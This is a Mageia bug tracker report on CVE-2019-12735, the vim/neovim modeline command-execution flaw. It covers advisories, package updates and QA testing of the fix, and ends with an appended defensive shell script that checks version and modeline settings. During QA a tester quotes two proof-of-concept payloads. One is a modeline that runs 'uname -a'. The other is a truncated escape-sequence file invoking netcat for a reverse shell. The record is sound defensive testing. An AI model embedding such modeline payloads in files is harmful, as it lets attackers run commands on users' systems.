| Summary: | vim, neovim new security issue CVE-2019-12735 | | |
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | major | | |
| Priority: | Normal | CC: | andrewsfarm, marja11, mhrambo3501, pkg-bugs, qa-bugs, smelror, sysadmin-bugs, tarazed25, thierry.vignaud, tmb |
| Version: | 7 | Keywords: | advisory, validated_update |
| Target Milestone: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| Whiteboard: | MGA7-64-OK | | |
| Source RPM: | vim-8.1.1048-1.mga7.src.rpm, neovim-0.3.5-1.mga7.src.rpm | CVE: | |
| Status comment: | | | |

Description
David Walser
2019-06-06 14:20:11 CEST
David Walser
2019-06-06 14:20:20 CEST
Whiteboard: (none) => MGA7TOO, MGA6TOO

Assigning to the neovim maintainer, because he might have more time than the vim maintainer. CC'ing the vim maintainer.

CC: (none) => marja11, thierry.vignaud

Neovim 0.3.7 pushed to updates_testing

RedHat has issued an advisory for vim on June 26:
https://access.redhat.com/errata/RHSA-2019:1619

Advisory
========

Neovim has been updated to fix a security issue.

CVE-2019-12735: getchar.c in Neovim before 0.3.6 allows remote attackers to execute arbitrary OS commands via the :source! command in a modeline, as demonstrated by assert_fails or nvim_input in Neovim.

References
==========

https://nvd.nist.gov/vuln/detail/CVE-2019-12735

Files
=====

Uploaded to core/updates_testing

neovim-0.3.7-1.mga7
neovim-data-0.3.7-1.mga7

from neovim-0.3.7-1.mga7.src.rpm

Stig-Ørjan Smelror
2019-07-04 19:34:02 CEST
Assignee: smelror => qa-bugs

vim needs to be fixed too.

Version: Cauldron => 7

Debian has issued an advisory for this on June 13:
https://www.debian.org/security/2019/dsa-4467

Ubuntu has issued advisories for this on June 11:
https://usn.ubuntu.com/4016-1/
https://usn.ubuntu.com/4016-2/

Severity: normal => major

Debian has issued an advisory for this on July 23:
https://www.debian.org/security/2019/dsa-4487

Fedora has issued an advisory for vim on June 6:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2BMDSHTF754TITC6AQJPCS5IRIDMMIM7/

We are still missing a vim update for Mageia 7. Someone please take care of it.

CC: (none) => pkg-bugs

David Walser
2020-01-14 18:09:23 CET
Status comment: (none) => neovim has been updated, vim update still needed

Patched package uploaded for Mageia 7.

Advisory:
========================

Updated vim package fixes security vulnerabilities:

It was discovered that Vim before 8.1.1365 and Neovim before 0.3.6 did not restrict the `:source!` command when executed in a sandbox. This allows remote attackers to take advantage of the modeline feature to inject arbitrary commands when a specially crafted file is opened (CVE-2019-12735).

References:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2BMDSHTF754TITC6AQJPCS5IRIDMMIM7/
https://nvd.nist.gov/vuln/detail/CVE-2019-12735
========================

Updated packages in core/updates_testing:
========================
vim-common-8.1.1048-1.1.mga7.x86_64.rpm
vim-enhanced-8.1.1048-1.1.mga7.x86_64.rpm
vim-minimal-8.1.1048-1.1.mga7.x86_64.rpm
vim-X11-8.1.1048-1.1.mga7.x86_64.rpm

from vim-8.1.1048-1.1.mga7.src.rpm

Whiteboard: MGA6TOO => (none)

Thanks. We'll need to clarify in the advisory that this update includes both vim and neovim.

Status comment: neovim has been updated, vim update still needed => (none)

mga7, x86_64

$ rpm -qa | grep neovim
neovim-0.3.5-1.mga7
neovim-data-0.3.5-1.mga7
nodejs-neovim-4.5.0-1.mga7

CVE-2019-12735
https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md

Two PoC available.

$ cat poc.txt
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

$ cat shell.txt
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 999!

*Before update*

This test demonstrates the vulnerability.

$ nvim poc.txt
<This executes the 'uname -a' command>
Linux canopus 5.1.14-desktop-1.mga7 #1 SMP Sat Jun 22 10:35:14 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Press ENTER or type command to continue
:q

$ nvim shell.txt
This starts a normal vi session without the reverse terminal and system call.

$ grep nomodelines /usr/share/vim/vimrc
returns nothing.

nomodelines is supposed to prevent the use of custom modelines in files to be edited by vim. So in the default configuration file that protection is not there. However, the exploit is not delivered either, which implies that the vulnerability has already been patched.

*After update*
- neovim-0.3.7-1.mga7.x86_64
- neovim-data-0.3.7-1.mga7.noarch
- vim-common-8.1.1048-1.1.mga7.x86_64
- vim-enhanced-8.1.1048-1.1.mga7.x86_64
- vim-minimal-8.1.1048-1.1.mga7.x86_64
- vim-X11-8.1.1048-1.1.mga7.x86_64

$ nvim shell.txt
Normal session, as before.

$ nvim poc.txt
Normal session, so the problem has been fixed.

For good measure, running these two tests with the vim, vi variants returned the same results.
Finished off this report using nvim.

*vim looks OK.

CC: (none) => tarazed25

Validating. Advisory information in Comment 4, Comment 9, and Comment 10.

Keywords: (none) => validated_update

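
Added example (not part of the bug report or the Mageia packages): a shell helper for the two checks the QA test above performs by hand, comparing a version against the upstream fixed versions named in the advisory (Vim 8.1.1365, Neovim 0.3.6) and reading a vimrc for the `modeline` / `modelines` options. The function names, the sample vimrc and the assumed editor defaults (modeline on, modelines=5) are this example's assumptions.

```shell
#!/bin/sh
# Added example: exposure check for CVE-2019-12735 (not from the bug report).
# Fixed upstream versions come from the advisory text: Vim 8.1.1365, Neovim 0.3.6.

# version_lt A B: succeed when A sorts strictly before B (needs GNU sort -V).
version_lt() {
    [ "$1" != "$2" ] &&
        [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# upstream_affected PRODUCT VERSION: succeed when VERSION predates the upstream fix.
upstream_affected() {
    case "$1" in
        vim)    version_lt "$2" 8.1.1365 ;;
        neovim) version_lt "$2" 0.3.6 ;;
        *)      return 2 ;;   # unknown product
    esac
}

# modeline_disabled FILE: succeed when FILE leaves modeline processing off.
# Assumed starting point: editor defaults of 'modeline' on and 'modelines' = 5.
modeline_disabled() {
    awk '
        BEGIN { ml = 1; mls = 5 }
        /^[ \t]*"/ { next }                            # vimrc comment line
        /^[ \t]*:?set?[ \t]/ {
            for (i = 2; i <= NF; i++) {
                if ($i ~ /^"/) break                   # trailing comment
                if ($i == "nomodeline" || $i == "noml") ml = 0
                else if ($i == "modeline" || $i == "ml") ml = 1
                else if ($i ~ /^(modelines|mls)=[0-9]+$/) { sub(/^[a-z]+=/, "", $i); mls = $i + 0 }
            }
        }
        END { exit ((ml && mls > 0) ? 1 : 0) }
    ' "$1"
}

# Demo on constructed input: versions quoted in the report and a sample vimrc.
demo() {
    rc=$(mktemp)
    printf '%s\n' '" constructed sample vimrc' 'set nocompatible nomodeline' > "$rc"
    for pv in neovim:0.3.5 neovim:0.3.7 vim:8.1.1048; do
        if upstream_affected "${pv%%:*}" "${pv#*:}"; then s=affected; else s=fixed; fi
        echo "$pv: upstream version $s"
    done
    if modeline_disabled "$rc"; then echo "modelines: off"; else echo "modelines: on"; fi
    rm -f "$rc"
}
demo
```

A distribution build can carry the fix under an older upstream number, as the patched vim-8.1.1048-1.1.mga7 in this report does, so an "affected" result from the version comparison is a prompt to check the package advisory, not proof of exposure.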
Thomas Backlund
2020-02-13 11:04:25 CET
CC: (none) => tmb

An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2020-0082.html

Resolution: (none) => FIXED